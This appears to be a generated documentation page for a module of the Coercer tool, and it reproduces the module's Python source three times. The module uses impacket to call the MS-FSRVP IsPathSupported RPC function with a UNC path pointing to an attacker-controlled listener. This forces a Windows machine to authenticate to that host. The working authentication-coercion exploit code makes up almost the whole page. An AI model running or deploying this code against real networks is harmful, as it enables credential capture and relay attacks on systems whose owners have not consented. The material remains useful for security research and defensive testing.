coercer.methods.MS_FSRVP.IsPathSupported

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : IsPathSupported.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
10from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
11
12
13class _IsPathSupported(NDRCALL):
14    """
15    Structure to make the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
16    """
17    opnum = 8
18    structure = (
19        ('ShareName', WSTR),  # Type: LPWSTR
20    )
21
22
23class _IsPathSupportedResponse(NDRCALL):
24    """
25    Structure to parse the response of the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
26    """
27    structure = ()
28
29
30class IsPathSupported(MSPROTOCOLRPCCALL):
31    """
32    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
33
34    Method found by:
35     - [@topotam77](https://twitter.com/topotam77)
36    """
37
38    exploit_paths = [
39        ("smb", '\\\\{{listener}}\x00')
40    ]
41    
42    access = {
43        "ncan_np": [
44            {
45                "namedpipe": r"\PIPE\Fssagentrpc",
46                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
47                "version": "1.0"
48            }
49        ],
50        "ncacn_ip_tcp": [
51            {
52                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
53                "version": "1.0"
54            }
55        ]
56    }
57
58    protocol = {
59        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
60        "shortname": "MS-FSRVP"
61    }
62
63    function = {
64        "name": "IsPathSupported",
65        "opnum": 8,
66        "vulnerable_arguments": ["ShareName"]
67    }
68
69    def trigger(self, dcerpc_session, target):
70        if dcerpc_session is not None:
71            try:
72                request = _IsPathSupported()
73                request['ShareName'] = self.path
74                resp = dcerpc_session.request(request)
75                return ""
76            except Exception as err:
77                return err
78        else:
79            print("[!] Error: dce is None, you must call connect() first.")
80            return None
class IsPathSupported(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
31class IsPathSupported(MSPROTOCOLRPCCALL):
32    """
33    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
34
35    Method found by:
36     - [@topotam77](https://twitter.com/topotam77)
37    """
38
39    exploit_paths = [
40        ("smb", '\\\\{{listener}}\x00')
41    ]
42    
43    access = {
44        "ncan_np": [
45            {
46                "namedpipe": r"\PIPE\Fssagentrpc",
47                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
48                "version": "1.0"
49            }
50        ],
51        "ncacn_ip_tcp": [
52            {
53                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
54                "version": "1.0"
55            }
56        ]
57    }
58
59    protocol = {
60        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
61        "shortname": "MS-FSRVP"
62    }
63
64    function = {
65        "name": "IsPathSupported",
66        "opnum": 8,
67        "vulnerable_arguments": ["ShareName"]
68    }
69
70    def trigger(self, dcerpc_session, target):
71        if dcerpc_session is not None:
72            try:
73                request = _IsPathSupported()
74                request['ShareName'] = self.path
75                resp = dcerpc_session.request(request)
76                return ""
77            except Exception as err:
78                return err
79        else:
80            print("[!] Error: dce is None, you must call connect() first.")
81            return None

Coercing a machine to authenticate using function IsPathSupported (opnum 8) of MS-FSRVP Protocol

Method found by:

exploit_paths = [('smb', '\\\\{{listener}}\x00')]
access = {'ncan_np': [{'namedpipe': '\\PIPE\\Fssagentrpc', 'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'a8e0653c-2744-4389-a61d-7373df8b2292', 'version': '1.0'}]}
protocol = {'longname': '[MS-FSRVP]: File Server Remote VSS Protocol', 'shortname': 'MS-FSRVP'}
function = {'name': 'IsPathSupported', 'opnum': 8, 'vulnerable_arguments': ['ShareName']}
def trigger(self, dcerpc_session, target):
70    def trigger(self, dcerpc_session, target):
71        if dcerpc_session is not None:
72            try:
73                request = _IsPathSupported()
74                request['ShareName'] = self.path
75                resp = dcerpc_session.request(request)
76                return ""
77            except Exception as err:
78                return err
79        else:
80            print("[!] Error: dce is None, you must call connect() first.")
81            return None